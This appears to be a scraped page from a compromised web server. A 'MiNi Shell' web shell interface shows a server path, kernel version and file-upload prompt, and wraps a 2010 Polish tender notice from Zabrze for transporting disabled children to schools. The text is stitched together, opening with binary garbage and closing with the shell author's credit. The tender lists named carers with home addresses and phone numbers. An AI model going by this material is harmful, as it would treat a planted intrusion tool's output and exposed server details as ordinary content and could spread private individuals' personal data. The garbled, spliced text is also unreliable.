JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100716/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100716/213180-N-2010.html

<p class="kh_header"><b>Zabrze: DOWÓZ DZIECI NIEPEŁNOSPRAWNYCH WRAZ Z OPIEKUNEM DO SZKÓŁ Z ODDZIELNĄ
OBSŁUGĄ  - Z PODZIAŁEM NA TRASY.</b><br>
<b>Numer ogłoszenia: 213180 - 2010; data zamieszczenia: 16.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Zabrze - Prezydent Miasta , ul. Powstańców Śląskich 5-7, 41-800 Zabrze, woj. śląskie, tel. (032) 3733537, 2710011, faks (032) 3733427, 2710818.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.zabrze.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOWÓZ DZIECI NIEPEŁNOSPRAWNYCH WRAZ Z OPIEKUNEM DO SZKÓŁ Z ODDZIELNĄ
OBSŁUGĄ  - Z PODZIAŁEM NA TRASY..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przewóz dzieci niepełnosprawnych wraz z opiekunem z miejsca zamieszkania  do szkół.
Zamówienie zostało podzielone na cztery trasy:

1. Trasa Nr XIII - przewóz  dzieci niepełnosprawnych poruszających się na wózkach wraz z opiekunem 
do Szkoły Podstawowej Nr 14 przy ul. Gdańskiej 10 w Zabrzu, do Zespołu Szkół Specjalnych Nr 42 przy ulicy Sienkiewicza 43 w Zabrzu oraz do Zespołu Szkół Specjalnych Nr 41 przy ul. Konopnickiej 3 w Zabrzu.

2. Trasa Nr XIX - przewóz  dzieci niepełnosprawnych wraz z opiekunem do Szkoły Podstawowej Nr 14 
przy ul. Gdańskiej 10 w Zabrzu, do Zespołu Szkół Specjalnych Nr 38 przy ul. Damrota 33 w Zabrzu 
oraz do Zespołu Szkół Specjalnych Nr 39 przy ul. Wolskiego 10 w Zabrzu.

3. Trasa Nr XXVI - przewóz dzieci niepełnosprawnych wraz z opiekunem do Szkoły Podstawowej Nr 14 
przy ul. Gdańskiej 10 w Zabrzu, do Zespołu Szkół Specjalnych Nr 39 przy ul. Wolskiego 10 w Zabrzu 
oraz do Zespołu Szkół Specjalnych Nr 40 przy ul. Bytomskiej 24 w Zabrzu.

4. Trasa Nr XXVII - przewóz dzieci niepełnosprawnych wraz z opiekunem do Szkoły Podstawowej Nr 8 
przy ul. Londzina 2 w Zabrzu, do Szkoły Podstawowej Nr 42 przy ul. Gagarina 2 w Zabrzu, do Gimnazjum Nr 9 przy ul. Olchowej 2 w Zabrzu oraz do Zespołu Szkół Specjalnych Nr 42 przy ul. Sienkiewicza 43 w Zabrzu.

Szczegółowy opis przedmiotu zamówienia zawiera Część IV SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 24.06.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać się doświadczeniem w zakresie świadczenia usług przewozu osób ,a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia tj. polegających na przewozie osób z podaniem ich wartości, przedmiotu,  dat wykonania  i odbiorców oraz dokumenty potwierdzające, że usługi te zostały wykonane lub w przypadku świadczeń okresowych lub ciągłych są wykonywane należycie o wartości łącznie co najmniej:

Trasa Nr XIII	42.000,00 PLN
Trasa Nr XIX	52.000,00 PLN
Trasa Nr XXVI	42.000,00 PLN
Trasa Nr XXVII	42.000,00 PLN


Warunek dotyczący doświadczenia Wykonawcy  nie podlega sumowaniu dla tras numer XIII, XIX, XXVI 
i XXVII tzn. spełnienie warunku wyższego jest równoznaczne ze spełnieniem warunku niższego - wymagania ilościowe i jakościowe można traktować łącznie dla każdej trasy.
Zamawiający oceni spełnienie przez Wykonawcę warunków udziału w postępowaniu stwierdzeniem: spełnia  lub nie spełnia, w oparciu o wymagane oświadczenia, dokumenty i zawarte w nich informacje.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać , że dysponuje odpowiednim potencjałem technicznym t.j pojazdów dostępnych wykonawcy w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami obejmujący nie mniej niż:

-na Trasę Nr XIII pojazd z liczbą miejsc siedzących dla minimum 10 osób 
(łącznie z kierowcą) w tym 3 siedzenia wyposażone w pasy bezpieczeństwa, pojazd wyposażony wyłącznie w windę, miejsce do bezpiecznego przewiezienia 1 wózka inwalidzkiego składanego i 3 nieskładanych wózków inwalidzkich przewożonych 
wraz z dziećmi; 
-na Trasę Nr XIX pojazd z liczbą miejsc siedzących dla minimum 12 osób 
(łącznie z kierowcą), w tym 3 siedzenia wyposażone w pasy bezpieczeństwa;
-na Trasę Nr XXVI pojazd z liczbą miejsc siedzących dla minimum 13 osób 
(łącznie z kierowcą);
-na Trasę Nr XXVII pojazd z liczbą miejsc siedzących dla minimum 9 osób 
(łącznie z  kierowcą), w tym 1 siedzenie wyposażone w pasy bezpieczeństwa;

Warunek dotyczący potencjału technicznego nie podlega sumowaniu dla tras numer XIII, XIX, XXVI i XXVII, tzn. wymagania ilościowe i jakościowe należy traktować oddzielnie dla każdej trasy. Zamawiający wymaga, aby dla każdej trasy Wykonawca podał różne pojazdy  do przewozu dzieci, tzn. proponowany pojazd do przewozu dzieci na wybranej trasie nie może obsługiwać więcej 
niż jednej trasy.

Zamawiający oceni spełnienie przez Wykonawcę warunków udziału w postępowaniu stwierdzeniem: spełnia  lub nie spełnia, w oparciu o wymagane oświadczenia, dokumenty i zawarte w nich informacje.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać , że dysponuje osobami do pełnienia funkcji opiekuna na poszczególne trasy , które będą uczestniczyć w wykonywaniu zamówienia, zatrudnione przez Wykonawcę.

		
Wykaz proponowanych przez szkoły osób do pełnienia funkcji opiekuna

Lp.	Imię i nazwisko	Adres zamieszkania	Telefon

1.Pal Wioletta	ul. Sobieskiego 3/7, Zabrze	509 529 376
2.Wąs Barbara	ul. Bukowa 7, Zabrze	663 365 999
3.Hudeczek Halina	ul. 1 Maja 9/6, Zabrze	032 271 85 32, 513 591 291
4.Dąbek Beata 	ul. Nicznickiego 11/5,  Zabrze  609 297 199
5.Milewska Monika 	ul. Grzybowska 25/9 , Zabrze 781 046 757
6.Tenerowicz Katarzyna ul. Hermisza 4/32, Zabrze 692 430 860
7.Nawrot Jolanta ul. 3 - Go Maja 7a/4, Zabrze (32)2711563
8.Niezgoda Edyta 	ul. Moniuszki 18/2, Zabrze 500 346 383
9.Demczuk Monika 	ul. Mikołaja Reja 10/1, Zabrze 785 475 086
10.Niestrój Iwona 	ul.  Przyszłości 30/13, Gliwice 504 048 234
11.Cheba Patryk 	ul. Wawrzynskiej 22/6, Zabrze 609 547 546
508 215 563
12.Olszewska Barbara ul. Kujawska 7, Gliwice 	509 195 957
13.Strutyńska Ewa	ul. Św. Urbana 13/5, Zabrze	663 773 668
14.Hanusek Tomasz	ul. Trocera 32/9, Zabrze	793 291 734
15.Krawczyk Szymon	ul. M. Curie-Skłodowskiej, Zabrze	604 848 415

Zamawiający wymaga aby: 
-dla Trasy Nr XIII Wykonawca zatrudnił 2 osoby do pełnienia funkcji opiekuna w tym 
1 osobę wymienioną w wykazie proponowanych przez szkoły osób do pełnienia funkcji opiekuna w pozycji 1,
-dla pozostałych Tras Wykonawca zatrudnił osobę do pełnienia funkcji opiekuna wymienioną w wykazie proponowanych przez szkoły osób do pełnienia funkcji opiekuna 
w pozycjach od 2 do 15 lub w przypadku braku osób do pełnienia funkcji opiekuna
określonych w powyższym wykazie, Wykonawca może zatrudnić osobę pełnoletnią zdolną do czynności cywilno-prawnych. W takiej sytuacji proponuje się aby funkcję opiekuna pełniła osoba posiadająca doświadczenie w opiece nad dziećmi.

Zamawiający wymaga aby Wykonawca uzyskał zgodę osoby wyznaczonej do pełnienia funkcji opiekuna na podjęcie zatrudnienia przy obsłudze wyłącznie jednej trasy. Uzyskana od opiekuna zgoda powinna wykluczać możliwość podjęcia przez niego zatrudnienia na innej trasie.

Warunek dotyczący potencjału kadrowego nie podlega sumowaniu dla tras numer XIII, XIX, XXVI i XXVII 
tzn. wymagania ilościowe należy traktować oddzielnie dla każdej trasy. Zamawiający wymaga, 
aby osoba wyznaczona do pełnienie funkcji opiekuna nie mogła obsługiwać więcej niż jednej trasy.


Zamawiający oceni spełnienie przez Wykonawcę warunków udziału w postępowaniu stwierdzeniem: spełnia  lub nie spełnia, w oparciu o wymagane oświadczenia, dokumenty i zawarte w nich informacje.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, 
w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający określa warunki zmian postanowień zawartej umowy na następujące:
1)	zmiany w składzie osób pełniących funkcję opiekuna dla poszczególnej trasy w trakcie przewozu uczniów niepełnosprawnych do szkół ze strony Zamawiającego lub Wykonawcy.
2)	zmiany środka transportu ze strony Wykonawcy na pojazd z odpowiednimi dla danej trasy wymogami określonymi w niniejszym SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zabrze.magistrat.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Oświaty -Urząd Miejski 
ul.Park Hutniczy 8,41-800 Zabrze ,pok.4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.07.2010 godzina 10:00, miejsce: Biuro Zamówień Publicznych
ul.Wolnosci 286 ,41-800 Zabrze , pok.305.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dowóz dzieci niepełnosprawnych wraz z opiekunem do szkół z oddzielną obsługą z podziałem na trasy- trasa nr XIII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Trasa Nr XIII - przewóz  dzieci niepełnosprawnych poruszających się na wózkach wraz z opiekunem 
do Szkoły Podstawowej Nr 14 przy ul. Gdańskiej 10 w Zabrzu, do Zespołu Szkół Specjalnych Nr 42 przy ulicy Sienkiewicza 43 w Zabrzu oraz do Zespołu Szkół Specjalnych Nr 41 przy ul. Konopnickiej 3 w Zabrzu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dowóz dzieci niepełnosprawnych wraz z opiekunem do szkół z oddzielną obsługą z podziałem na trasy- trasa XIX.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2)	Trasa Nr XIX - przewóz  dzieci niepełnosprawnych wraz z opiekunem do Szkoły Podstawowej Nr 14 
przy ul. Gdańskiej 10 w Zabrzu, do Zespołu Szkół Specjalnych Nr 38 przy ul. Damrota 33 w Zabrzu 
oraz do Zespołu Szkół Specjalnych Nr 39 przy ul. Wolskiego 10 w Zabrzu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dowóz dzieci niepełnosprawnych wraz z opiekunem do szkół z oddzielną obsługą z podziałem na trasy- trasa nr XXVI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3)	Trasa Nr XXVI - przewóz dzieci niepełnosprawnych wraz z opiekunem do Szkoły Podstawowej Nr 14 
przy ul. Gdańskiej 10 w Zabrzu, do Zespołu Szkół Specjalnych Nr 39 przy ul. Wolskiego 10 w Zabrzu 
oraz do Zespołu Szkół Specjalnych Nr 40 przy ul. Bytomskiej 24 w Zabrzu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dowóz dzieci niepełnosprawnych wraz z opiekunem do szkół z oddzielną obsługą z podziałem na trasy- trasa nr XXVII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 4)	Trasa Nr XXVII - przewóz dzieci niepełnosprawnych wraz z opiekunem do Szkoły Podstawowej Nr 8 
przy ul. Londzina 2 w Zabrzu, do Szkoły Podstawowej Nr 42 przy ul. Gagarina 2 w Zabrzu, do Gimnazjum Nr 9 przy ul. Olchowej 2 w Zabrzu oraz do Zespołu Szkół Specjalnych Nr 42 przy ul. Sienkiewicza 43 w Zabrzu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com